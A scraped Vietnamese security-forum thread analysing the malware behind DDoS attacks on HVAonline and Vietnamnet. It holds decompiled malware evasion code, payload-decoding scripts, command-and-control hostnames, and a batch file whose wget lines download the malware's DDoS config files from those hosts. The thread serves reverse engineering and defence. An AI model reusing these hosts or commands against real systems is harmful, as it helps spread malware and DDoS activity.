Phân tích tính chất vài trận DDoS HVA vừa qua. http://www.microsoft.com/security/portal/Definitions/ADL.aspx#top]]> /hvaonline/posts/list/39641.html#246351 /hvaonline/posts/list/39641.html#246351 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246352 /hvaonline/posts/list/39641.html#246352 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246354 /hvaonline/posts/list/39641.html#246354 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. http://www.mywot.com/wiki/Malware_submission Hiện tại tôi cũng theo trang này mà up mẫu thôi, chịu khó đi từ trên xuống dưới. Không biết có ai ở Vietnamnet đang đọc bài không, có thể cho anh em HVA và mọi người biết tình hình DDOS vào Vietnamnet có giãm đi chưa ! Tôi nghĩ là giãm đáng kể rồi vì hầu hết các AV đã cập nhật iTunesHelper*.exe và kill nó.]]> /hvaonline/posts/list/39641.html#246355 /hvaonline/posts/list/39641.html#246355 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

Iwwaty wrote:
Máy em có cài KIS update thường xuyên và dùng 64bit nên chắc cũng không đáng ngại. Dạo này máy có mấy triệu chứng lạ nên post lên nhờ các anh kiểu tra hộ. Cảm ơn anh Conmale và anh TQN đã quan tâm. 
Không hẳn đâu em. Dòng Windows XP trở lên dùng 64-bit vẫn có khả năng backward compatible với 32-bit. Bởi vậy 32-bit apps (và malware) vẫn có thể tấn công như thường. Cách dễ nhất để thu hẹp phạm vi nguyên nhân các triệu chứng lạ là nên dùng portmon và processmon http://technet.microsoft.com/en-us/sysinternals/bb896644) để theo dõi xem cái gì đi vô, đi ra máy mình. Từ đó xác định được processes / binaries nào có khả năng là nguyên nhân tạo "triệu chứng lạ". Nếu bà con tìm thấy được những triệu chứng lạ và có thể thu thập thông tin đồng thời cung cấp luôn nguồn gốc của những chương trình "lạ" ấy từ đâu ra thì càng tốt (ví dụ: vừa cài thêm soft download ở xyz..., vừa mở file đính kèm từ email...).]]>
/hvaonline/posts/list/39641.html#246361 /hvaonline/posts/list/39641.html#246361 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246363 /hvaonline/posts/list/39641.html#246363 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale wrote:

Iwwaty wrote:
Máy em có cài KIS update thường xuyên và dùng 64bit nên chắc cũng không đáng ngại. Dạo này máy có mấy triệu chứng lạ nên post lên nhờ các anh kiểu tra hộ. Cảm ơn anh Conmale và anh TQN đã quan tâm. 
Không hẳn đâu em. Dòng Windows XP trở lên dùng 64-bit vẫn có khả năng backward compatible với 32-bit. Bởi vậy 32-bit apps (và malware) vẫn có thể tấn công như thường. Cách dễ nhất để thu hẹp phạm vi nguyên nhân các triệu chứng lạ là nên dùng portmon và processmon http://technet.microsoft.com/en-us/sysinternals/bb896644) để theo dõi xem cái gì đi vô, đi ra máy mình. Từ đó xác định được processes / binaries nào có khả năng là nguyên nhân tạo "triệu chứng lạ". Nếu bà con tìm thấy được những triệu chứng lạ và có thể thu thập thông tin đồng thời cung cấp luôn nguồn gốc của những chương trình "lạ" ấy từ đâu ra thì càng tốt (ví dụ: vừa cài thêm soft download ở xyz..., vừa mở file đính kèm từ email...). 
Tiếc là Portmon không hỗ trợ Windows 64-bit.]]>
/hvaonline/posts/list/39641.html#246372 /hvaonline/posts/list/39641.html#246372 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. THẢO LUẬN THÊM VỀ IAStorDataMgrSvc.exe FILE 1- Bạn 1visao gần đây có upload lên Mediafire một file .rar có tên là "IAStore_26_08_2011" và nhờ HVA kiểm tra xem các file .dll và .exe trong file này có phải là virus-trojan của STL không? Anh TQN đã RCE và phân tích file này, bài viết trong topic. Xin các bạn tham khảo. 2- File (process) IAStorDataMgrSvc.exe là một Chipset sofware của Intel, tên là Intel(R) Rapid Storage Technology. Phần mềm này download tai downloadcenter.intel.com (File iata_enu_10.6.0.1022.exe, dung lương khoảng 7 MB). Intel(R) Rapid Storage Technology soft. hỗ trợ cho nhiều Dell Desktop khi áp dụng RAID 5-10 và cũng hỗ trợ RAID 0, 1, AHCI & Matrix RAID trong một số Dell desktop và cho các mobile platforms. Intel đôi lúc gọi soft này là một "driver". Như vậy Intel(R) Rapid Storage Technology (mà IAStorDataMgrSvc.exe nằm trong nó), liên quan nhiều đến Dell hardware. Từ đó ta thấy soft này không phổ biến và số người sử dụng nó chắc không nhiều. 3- Khi cài đặt (tôi đã cài thử Intel(R) Rapid Storage Technology vào máy mình) thì service-process IAStorDataMgrSvc.exe nằm ở 2 thư mục sau: C:/Program Files/Intel/Intel(R) Rapid Storage Technology/IAStorDataMgrSvc.exe và C:/WINDOWS/system 32/. Vì vậy nếu phát hiện IAStorDataMgrSvc.exe nằm ở các thư mục khác thì nó có thể là một virus hay Trojan. Nhiệm vụ của IAStorDataMgrSvc.exe (origin file) theo tôi đại thể là khi khởi đông nó kích hoạt hàng loạt file .dll (giống như trường hợp của iTunesHelper.exe-origine trong iTunes 10.4 chẳng hạn, không phải là malicious iTunesHelper.exe) và "sắp xếp" chúng theo một sơ đồ tiến độ đã định để máy tính hoạt động nhanh và hiệu quả nhất. Vì vậy nó đóng một vai trò khá quan trọng trong hệ thống. Vả lại những software liên quan và điều khiển hardware như SCSI Adapter, RAID... thường khá phức tạp. 4- Trong quá khứ (cách đây từ vài năm) nhiều hiện tượng process IAStorDataMgrSvc.exe bị hư hỏng (error) hay sai sót (corruption) thường được báo cáo cho Intel. Có một số trường hơp phát hiện process này bị nhiễm virus. Khi IAStorDataMgrSvc.exe bị hư hỏng thì máy có hiện tượng chạy châm (do IAStorDataMgrSvc.exe chiếm một tỷ lệ cao trong năng lưc CPU được sử dụng, có khi đến 80-90%), máy hay restart.... Khi bị nhiễm virus, máy có những kết nôi đến các website lạ (của hacker) và trang default của trình duyệt hay bị thay đổi.... 5- Tôi vừa thử nghiêm kích hoạt malicious IAStorDataMgrSvc.exe (nằm trong file do bạn 1visao cung cấp) trên máy của mình để kiểm tra. Những hiện tương sau đây được xác nhận sau khi đã kiểm chứng nhiều lần: - Không có bất cứ một cuộc tấn công DDoS nào đươc thưc hiện từ máy của tôi. Tất nhiên là không có cuộc tấn công DDoS vao vietnamnet. Malicious IAStorDataMgrSvc.exe trong trường hơp này (từ ban 1visao cung cấp) không phải là một DDoS tool. - IAStorDataMgrSvc.exe thường xuyên khời phát quá trình kết nôi với 3 website và một IP address như sau:
easy.lixns.com (119.153.92.129)-webserver đặt tai Pakistan direct.fqin.net (119.153.92.110) -webserver đặt tai Pakistan find.laxt.net (74.115.79.191) -webserver đặt tai Mỹ IP: 239.255.255.250  
Khi check vào các website-webserver này thì thấy chỉ có webserver direct.fqin.net là active (nối mạng) còn 3 cái còn lại thì inactive-offline. Có vài đăc điểm: - Khi check webserver direct.fqin.net thấy nó mở 3 cổng 21, 23 và 80, thấy một server tên là RomPager/4.07 UPnP/1.0 (đây là 1 software của ZyXEL router- như vậy hacker có thể đang dùng router để Remote access vào một máy mục tiêu, thông qua Telnet) thay vì NGINX như lãnh đạo STL thường làm - Các webserver này chỉ hosting một website, như đã thông kê trên đây. 6- Kết luận IAStorDataMgrSvc.exe do ban 1 visao cung cấp không phải là một DDoS tool, càng không phải là một DDoS tool tấn công vào vietnamnet. Nhưng đó là một Malicious IAStorDataMgrSvc.exe . Nó chắc không phải là một "sản phẩm " (mèo què- như anh TQN hay gọi) của lãnh đạo STL. Nó có thể của các hacker khác, thí dụ Pakistan hacker chẳng hạn. ]]>
/hvaonline/posts/list/39641.html#246376 /hvaonline/posts/list/39641.html#246376 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246411 /hvaonline/posts/list/39641.html#246411 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246412 /hvaonline/posts/list/39641.html#246412 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale wrote:

TMT102 wrote:
Đây là chuyện nhức nhối và đây là chuyện cần phải thay đổi tận gốc. Như em đã có lần nhận xét rằng, những vết thương ung mủ không chịu chữa trị thì dần dần sẽ dẫn đến hoại thư cho cả một cơ thể là vậy. Bịnh thành tích là hội chứng của sự mặc cảm, sự sợ hãi sự thật và thói quen che đậy. Những căn bịnh này dần dần sẽ huỷ hoại sự thật, huỷ hoại đức tính trung thực, huỷ hoại lòng dũng cảm đối diện với thiếu sót để thay đổi và phát triển. Đây không phải là chuyện đùa nữa rồi. 
Điều này lằm tôi rất buồn . Làm thế nào mà thay đổi tận gốc được đây . Không nhẽ bảo tôi tự chặt chân mình đi à ? Cái điều tôi sợ nhất là phải nhổ cái cây ấy đi và trồng cây khác . Lại đau đầu . 
Vấn đề nằm ở chỗ chấp nhận để cái cây ấy sống dở, chết dở, đang bị ung rữa dần dần để rồi một lúc nào đó nó sẽ ngã nhào hay là đốn cái cây đã bị bệnh nặng ấy đi để trồng cây khác hay không thôi. Bạn chặt chân bạn hoàn toàn khác việc bạn chặt một cái cây bị ung hoại. Bạn đau đầu vì thấy cái cây ấy đang ung rữa hơn là bạn đau đầu vì phải chặt cái cây đang bị ung rữa? Nếu bạn thấy việc chặt nó đau đầu hơn là việc ngồi nhìn nó ung rữa thì đừng chặt. 
Nói về triết lý comale chưa hiểu hết tôi rồi . " Không nhẽ bảo tôi tự chặt chân mình đi à ? " không phải nói tôi mà nói cái kiến trúc thượng tầng được hình thành bởi cái gốc đó . Nó không thể tự khai tử nó được ! Nhưng để thay đổi nó mình phải làm như thế nào đây ? Tôi cũng là hạng vô danh tiểu tốt ( như trong IT vậy ) nhưng đó là lý tưởng của tôi . Dù là nhỏ nhất tôi cũng sẽ thay đổi nó . Thay đổi cái không hợp lý đã được mọi người "thích nghi " và biến nó thành hợp lý ! Vài dòng tâm sự ngoài lề .Các bác đừng có xoá nick em nha .]]>
/hvaonline/posts/list/39641.html#246419 /hvaonline/posts/list/39641.html#246419 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246420 /hvaonline/posts/list/39641.html#246420 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246422 /hvaonline/posts/list/39641.html#246422 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246432 /hvaonline/posts/list/39641.html#246432 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

thuypv wrote:
Tình hình là rất tình hình, đến bây giờ vietnamnet.vn vẫn ko thể vào được Hem biết vietnamnet đang tiến hành khắc phục như thế nào mà chậm vậy, hay là chịu chết Bác Tử Quảng đầu trọc hay ho he đâu rồi mà sao vụ này ko thấy ý kiến ý cỏ gì nhỉ, chán thật, vụ bên Hàn Xẻng xa xôi mà bác ấy còn truy lùng được sao vụ này kém thế 
Bạn xem lại mạng của mình xem nhé. Ngày nào mình cũng vào vietnamnet bình thường mà? Theo mình nhớ không nhầm thì chỉ có 2 3 hôm trùng với thời điểm hva bị tấn công là vietnamnet khó vào thôi. Từ đó đến nay mình vào rất tốt mà? Tốc độ khá nhanh]]>
/hvaonline/posts/list/39641.html#246438 /hvaonline/posts/list/39641.html#246438 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

mylove14129 wrote:
Bạn xem lại mạng của mình xem nhé. Ngày nào mình cũng vào vietnamnet bình thường mà? Theo mình nhớ không nhầm thì chỉ có 2 3 hôm trùng với thời điểm hva bị tấn công là vietnamnet khó vào thôi. Từ đó đến nay mình vào rất tốt mà? Tốc độ khá nhanh 
Cả tuần nay mình vào báo điện tử Vietnamnet.vn cũng không được. ]]>
/hvaonline/posts/list/39641.html#246442 /hvaonline/posts/list/39641.html#246442 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246446 /hvaonline/posts/list/39641.html#246446 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246448 /hvaonline/posts/list/39641.html#246448 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

mylove14129 wrote:
Mình dùng mạng của VDC và viettel(3g) thấy vào tốc độ ầm ầm :D  
Uhm đúng thế, mình sử dụng internet cáp SCTV, khoảng 3 bữa nay tốc độ load rất tốt, chỉ có vietnamnet bỏ hẳn link của tuanvietnam ra khỏi trang chính của mình thôi.]]>
/hvaonline/posts/list/39641.html#246449 /hvaonline/posts/list/39641.html#246449 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246450 /hvaonline/posts/list/39641.html#246450 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246453 /hvaonline/posts/list/39641.html#246453 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

bula87 wrote:
Anh bozalno_1989 xem giúp mình các file LOG này với, mình đã làm theo hướng dẫn của bạn nhưng phần log Autorunsc mình làm rồi mà ko được, chả biết vì lý do gì nữa... link file LOG http://www.mediafire.com/?kaxowfeyf4409r0 
Mình vừa cập nhật hướng dẫn scan và gửi log Autorunsc, bạn thực hiện lại theo hướng dẫn nhé: Hướng dẫn scan và gửi log Autorunsc (Autoruns command-line) http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autorunsc-(autoruns-command-line)/ ]]>
/hvaonline/posts/list/39641.html#246465 /hvaonline/posts/list/39641.html#246465 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 wrote:

bula87 wrote:
Anh bozalno_1989 xem giúp mình các file LOG này với, mình đã làm theo hướng dẫn của bạn nhưng phần log Autorunsc mình làm rồi mà ko được, chả biết vì lý do gì nữa... link file LOG http://www.mediafire.com/?kaxowfeyf4409r0 
Mình vừa cập nhật hướng dẫn scan và gửi log Autorunsc, bạn thực hiện lại theo hướng dẫn nhé: Hướng dẫn scan và gửi log Autorunsc (Autoruns command-line) http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autorunsc-(autoruns-command-line)/  
Mình đã làm theo hướn dẫn của bolzano_1989, bạn xem giúp mình nhé link file LOG Code:
http://www.mediafire.com/?99de4x8bgb4b48c
thanks ]]>
/hvaonline/posts/list/39641.html#246485 /hvaonline/posts/list/39641.html#246485 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246498 /hvaonline/posts/list/39641.html#246498 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246502 /hvaonline/posts/list/39641.html#246502 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. http://anhbasam.wordpress.com/2011/06/10/
- Độc giả NT loan báo: Xin quý vị cẩn thận với email có địa chỉ “Nam Hoang”. Nếu mở file ra xem máy sẽ bị dính virus ngay. Có thể bị mất password email và các blogs, các accounts khác nếu chúng thâm nhập vào máy mình. Đã reported Google để họ xếp vào email tin tặc. Không nên mở email nào có dạng .rar Tập tin đính kèm: Can canh tau ngu chinh TQ.rar Kích thước: 512,221 bytes . Khi giải nén sẽ cho ra những hình ảnh sau đây: trong số đó, tập tin “001 – Tau ngu chinh 303 – Pha hoaics.jpg” không phải là hình mà là dạng screen saver (một loại executable). Nếu bấm mở tập tin đó lên sẽ bị dính mã độc.  

]]>
/hvaonline/posts/list/39641.html#246504 /hvaonline/posts/list/39641.html#246504 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246506 /hvaonline/posts/list/39641.html#246506 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246510 /hvaonline/posts/list/39641.html#246510 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 wrote:
TMDTHBC, bạn chưa gửi log Autoruns: Hướng dẫn scan và gửi log Autoruns http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autoruns/  
Mình gửi lại log autoruns. http://www.mediafire.com/?derlj34eeq7edp8 Thanks very much. ]]>
/hvaonline/posts/list/39641.html#246512 /hvaonline/posts/list/39641.html#246512 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246515 /hvaonline/posts/list/39641.html#246515 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 wrote:
TMDTHBC, log của bạn bình thường, tôi không thấy dấu hiệu bị lây nhiễm virus nào cả, bạn có gặp dấu hiệu nào đặc thù cho việc bị lây nhiễm virus máy tính ở máy của bạn không? Bạn có thể tham khảo bài viết sau của mình: Một số hiện tượng đặc trưng biểu hiện máy tính bị lây nhiễm virus máy tính http://support.cmclab.net/vn/tut0rial/mot-so-hien-tuong-dac-trung-bieu-hien-may-tinh-bi-lay-nhiem-virus-may-tinh/  
Mình có download file dic dùng dò pass wifi, load xong, bung nén compile thì thấy máy chạy chậm hẳn. Đã kiểm tra bằng ms essential, tcpview, proc mon thì không phát hiện gì. Hiện tượng trên vẫn còn nên nhờ Mr. bolzano check giúp. Nếu có phát hiện gì mới mình sẽ cần bạn giúp đỡ. thanks]]>
/hvaonline/posts/list/39641.html#246527 /hvaonline/posts/list/39641.html#246527 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246529 /hvaonline/posts/list/39641.html#246529 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246532 /hvaonline/posts/list/39641.html#246532 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Thật sự là em quá thất vọng về mấy coder của anh em stl quá. Chống lại RCE của em và các anh em khác bằng những kỹ thuật quá ấu trĩ , sơ đẵng, ngây thơ và buồn cười, tệ hết chổ nói, làm em phát bực luôn. Detect AV chỉ một mình AVG thôi sao. Trên thế giới này biết bao nhiêu là AVs. Chống lại DecodeBin.1sc của em chỉ vậy thôi à, 5 phút thôi là em có DecodeBin2.1sc khác ! Lần này lại chơi trò delete file .idb của IDA nữa. Quá tệ, quá sơ đẵng trong suy nghĩ. Nếu em save file .idb ở thư mục khác thì sao ? Đề nghị anh em stl tập dùng IDA đi ? Mình phải hiểu đối thủ thì mới chống lại được chứ. Liệu mấy anh có đủ sức,đủ trình độ anti mọi decompiler, diassembler, mọi tool RCE không ? Về code và RCE, cả tập thể mấy anh không thể nào chống lại em nổi đâu, không ai là đối thủ của em đâu. Nhớ một điều vậy nhé. Em chỉ là một newbie, một tay mơ, nữa mùa trong giới RCE Vietnam thôi, còn hàng trăm, hàng ngàn cao thủ đích thực khác nữa mà các anh không biết đấy. 
Theo em thấy thì dù AVG không tốt bằng Avira nhưng AVG rất giỏi trong việc quảng cáo nên bà con người Việt dùng hàng antivirus miễn phí thường chọn AVG thay vì Avira, dường như có xu hướng chuyển từ AVG sang Avast! nhưng AVG vẫn rất được tin dùng bởi nhiều người Việt. Mấy trò còn lại thì ấu trĩ thật.]]>
/hvaonline/posts/list/39641.html#246537 /hvaonline/posts/list/39641.html#246537 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. Code:
void __stdcall DetectHijackthisExe(int a1)
{
    HANDLE hSnapshot; // esi@2
    PROCESSENTRY32W pe; // [sp+10h] [bp-230h]@1
    unsigned int sanity; // [sp+23Ch] [bp-4h]@1

    sanity = (unsigned int)&pe ^ __security_cookie;
    while ( 1 )
    {
        hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
        memset(&pe.cntUsage, 0, 0x228u);
        pe.dwSize = 556;
        if ( Process32FirstW(hSnapshot, &pe) )
        {
            do
            {
                if ( !lstrcmpiW(pe.szExeFile, L"hijackthis.exe") )
                    ExitProcess(0);
            }
            while ( Process32NextW(hSnapshot, &pe) );
        }
        CloseHandle(hSnapshot);
        Sleep(0xC8u);
    }
}
Tính làm cho Bolzano nhà ta thất nghiệp ha ? Nhưng lại code ngớ ngẩn như vậy: detect thấy hijackthis.exe, thay vì kill process hijackthis.exe thì chính mình lại đi exit. ]]>
/hvaonline/posts/list/39641.html#246544 /hvaonline/posts/list/39641.html#246544 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246552 /hvaonline/posts/list/39641.html#246552 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246558 /hvaonline/posts/list/39641.html#246558 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

thuypv wrote:
Tình hình là mấy ngày nay em ko vào được vietnamnet nữa rồi, kể cả www.vietnamnet.vn và vietnamnet.vn Chán thật 
Bạn kiểm tra thế nào ấy chứ mình vẫn vào bình thường mà :) .]]>
/hvaonline/posts/list/39641.html#246559 /hvaonline/posts/list/39641.html#246559 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246560 /hvaonline/posts/list/39641.html#246560 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246561 /hvaonline/posts/list/39641.html#246561 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 wrote:
Có khi nào địa chỉ IP của bạn bị chặn hay là máy tính của bạn bị nhiễm virus của STL chăng? Bạn gửi log như các hướng dẫn mình đã gửi trong chủ đề này, mình xem thử. 
Thực ra không phải vậy đâu anh ơi. Em đã test thử rồi máy nhà (FPT), quán cafe(quên xem nó mạng gì) và cả tiệm net (CMC) không nơi nào vào được vietnamnet anh à. Nghe mấy anh nói có cookies cũ thì vào được vậy ai có làm ơn gửi lên em thử cái :D cảm ơn.]]>
/hvaonline/posts/list/39641.html#246562 /hvaonline/posts/list/39641.html#246562 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246563 /hvaonline/posts/list/39641.html#246563 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

thuypv wrote:
MÌNH DÙNG BẢN KIS 2011 BẢN QUYỀN, CHẮC LÀ KO BỊ STL ĐÂU 
chịu khó đọc lại topic này từ đầu đi bạn. KIS , AVG,.. bản quyền hay không bản quyền thực ra cũng chỉ tạo ra sự yên tâm trong tâm lý cho người sử dụng thôi. ]]>
/hvaonline/posts/list/39641.html#246564 /hvaonline/posts/list/39641.html#246564 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

thuypv wrote:
Ko vào được bạn à, thử hết rồi mình dùng mạng của viettel 
Ái chà, mình vẫn vào bình thường nhưng sau khi clear cookies thì không vào được nữa.]]>
/hvaonline/posts/list/39641.html#246566 /hvaonline/posts/list/39641.html#246566 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. Code:
//-------------------------------------------------------------
//--- 010 Editor v3.2 Script File
//
// File: DecodeRfcTxt.1sc
// Author: ThangCuAnh (TQN) 
// Revision: 1.0
// Purpose: Decode the Rfcxxx.txt files downloaded from:
//  1. http://news.pedto.com/rfc1945.txt
//  2. http://blogs.pinix.org/rfc1945.txt
//  3. http://analytics.dynn.info/rfc1945.txt
//  4. http://news.pedto.com/rfc2616.txt
//  5. http://blogs.pinix.org/rfc2616.txt
//  6. http://analytics.dynn.info/rfc2616.txt
//-------------------------------------------------------------
int i, j, size = FileSize();

if (size <= 0)
{
    MessageBox(idOk, "DecodeRfcTxt", "No file loaded or file empty.");
    return -1;
}

// Modify from 8th byte
for (i = 0, j = 0; i < size; i += 2, ++j)
{
    // Modify the current byte
    WriteUByte(j, ReadUByte(i) - 65 + 26 * (ReadUByte(i + 1) - 65));
}
DeleteBytes(j, size);
Thêm cái script này nữa: Code:
//----------------------------------------------------------------
//--- 010 Editor v3.2 Script File
//
// File: DecodeRwoqv.1sc
// Author: ThangCuAnh (TQN) 
// Revision: 1.1
// Purpose: Decode and extract the embedded PE files in rwoqv.exe
//----------------------------------------------------------------
char Mask[] = "ï¾­ÞNullsoftInst '";
char strBin[255];

int i, j, iFiles, curFile, newFile;
int64 liPos, fSize;

// Check that a file is open
if (FileCount() == 0)
{
    MessageBox(idOk, "DecodeBin", "DecodeBin can only be executed when a file is loaded.");
    return -1;
}

// Save the file index of current file
curFile = GetFileNum();

// Find the embedded PE files
liPos = FindFirst(Mask);
if (liPos < 0)
{
    MessageBox(idOk, "DecodeBin", "Could not find the mask of embedded PE files");
    return -1;
}

liPos += 20;
liPos += 0x100; // stl coder modified code here
iFiles = ReadInt(liPos);
liPos += sizeof(int);

Printf("Number of embedded PE files %d - Start at 0x%LX", iFiles, liPos);

for (i = 0; i < iFiles; ++i)
{
    fSize = ReadInt(liPos);
    liPos += sizeof(int);
    SetSelection(liPos, fSize);
    CopyToClipboard();

    newFile = FileNew();
    FileSelect(newFile);    // force select new file
    PasteFromClipboard();

    // Decode the new file
    for (j = 0; j < FileSize(); ++j)
    {
        // Modify the current byte
        WriteUByte(j, ReadUByte(j) ^ (( j & 7) + 0x3E));    // stl coder modified code here
    }
    SPrintf(strBin, "File%d.bin", i + 1);
    strBin = InputSaveFileName("Save decoded PE as", "All files (*.*)", strBin, ".bin");
    FileSave(strBin);

    // Switch to old file
    FileSelect(curFile);

    // Seek to next embedded PE file
    liPos += fSize;
}
Và cái tracker.cmd cùi bắp luôn: Code:
@echo off

echo ==================================================================================================
echo Download cac file trojan, bot va DDOS config files cua stl malwares mao danh soft cua QuickTime
echo Cac ban gap 2 file nay: QTTask.exe va QTTask.dll thi kill va xoa ngay !!!!!!!!!!!!!!!!!!!!!!!!!!!!
echo ===================================================================================================
echo.

wget -t3 "http://news.pedto.com/rfc1945.txt" -O news.pedto.com_rfc1945.txt
wget -t3 "http://blogs.pinix.org/rfc1945.txt" -O blogs.pinix.org_rfc1945.txt
wget -t3 "http://analytics.dynn.info/rfc1945.txt" -O analytics.dynn.info_rfc1945.txt
wget -t3 "http://news.pedto.com/rfc2616.txt" -O news.pedto.com_rfc2616.txt
wget -t3 "http://blogs.pinix.org/rfc2616.txt" -O blogs.pinix.org_rfc2616.txt
wget -t3 "http://analytics.dynn.info/rfc2616.txt" -O analytics.dynn.info_rfc2616.txt

pause
]]>
/hvaonline/posts/list/39641.html#246569 /hvaonline/posts/list/39641.html#246569 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246577 /hvaonline/posts/list/39641.html#246577 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246579 /hvaonline/posts/list/39641.html#246579 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 wrote:
Thông báo: Hôm nay em đi mua 1 desktop cho 1 người quen ở Trần Anh (292 Tây Sơn), khi về setup thêm Avira thì thấy thông báo bắt đc Malware lây nhiễm vào file justcheck và 1 số file khác trong thư mục java, lỡ bị xoá mất mà không có bản ghost đi kèm máy nên em ko copy đc mẫu về. Như vậy 100% máy tính được cài đặt tại Trần Anh khi bán đều bị nhiễm malware, anh em chú ý Bro tech nào của Trần Anh tham gia HVA thì chú ý giúp em nhé 
mình xác nhận thông tin này là đúng vì mình cũng mua laptop tại trananh ! mấy tay kỹ thuật viên đó ghost cho mình bản win dùng thử 30 ngày sau khi cài phần mềm AVIRA nó báo nhiễm virus dòng sality may mà AVIRA update đã diệt sạch được nó nhưng toàn bộ các file EXE phần mềm mình cài đặt vào máy đã bị lũ sality này nuốt chửng liều có phải trong bản ghost trananh sử dụng có cài virus ]]>
/hvaonline/posts/list/39641.html#246604 /hvaonline/posts/list/39641.html#246604 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Mấy anh stl học lại kỹ thuật code dùng zlib đi nhé ! Em khuyên thành thật ấy. Dùng zlib từ đó tới giờ mà không biết cách uncompress trên memory à ? Ai lại đi chơi lấy buffer zip ghi vào temp file rồi dùng hàm của zlib uncompress, rồi lại ghi vào temp file khác, rồi lại đọc lên. Lúc em RCE, em nói quái, sao đi lòng vòng vầy nè ? Cuối cùng "thì ra em đã hiểu", mấy anh chỉ biết dùng mấy hàm zlib cho file thôi ! Cho em rút lại lời khen thằng coder C++ của mấy anh nhé, code vầy tệ lắm. Gặp em là team leader của nó thì em sạc nó thẵng tay rồi. PS: Làm cái gì mà căm danlambaovn.blogspot.com thế, DDOS hoài không chán à ? 
NÓNG QUÁ, nóng không chịu được... thật là lạ, 3 anh em có hết có 2 chai vodka thôi mà ...!? Thiệt đúng là đám virus "mèo què" này rơi vào tay một con người từng khẳng định "chưa viết virus bao giờ" lại còn đòi "đưa ra bằng chứng" , dám khẳng định trên tầm anonymost và lulzec... thiệt là không xứng, không xứng mà ! :-O :-O tưởng bộ, người nào có nội công thâm hậu mà... chưa từng bỏ thời gian chọc ngoáy, nghịch ngợm này nọ. TQN là ngoại lệ sao !? Thích phân tích thì cứ phân tích đi, sao phải chê bai, mạt sát, chửi bới... Code decode kìa.. họ đã có encode thì tất yếu phải có decode khi họ kích hoạt rồi, TQN giành tặng họ làm chi nữa !? Thật khiến người ta muốn "OẸ" quá mà. @Conmale: Tôi thấy nên đổi tên luồng bài này thành "Phân tích kĩ thuật vài trận DDoS HVA vừa qua." thì hợp lý hơn, chứ nếu để là "Phân tích tính chất vài trận DDoS HVA vừa qua." thì ít nhiều cũng có phân tích, bóc tách vì sao họ tấn công hvaonline !? Do sở thích chăng ? Rõ ràng là ai cũng biết mà -:|- @TQN: Có mẫu mới rồi kìa, TQN lại phải vất vả rồi :D . Tớ dám chắc là so với Anonymoust và lulzec thì TQN chưa thể bằng họ đâu :D Xin lỗi Ban quản trị diễn đàn và mọi người nha, đừng "gán" cho tớ cái danh STL hay bênh vực ai cả. Tớ là dân kinh doanh nhưng cũng thích kĩ thuật lắm. Ban quản trị diễn đàn cho tớ gác nhờ bài này nhé ./. Cảm ơn ! ]]>
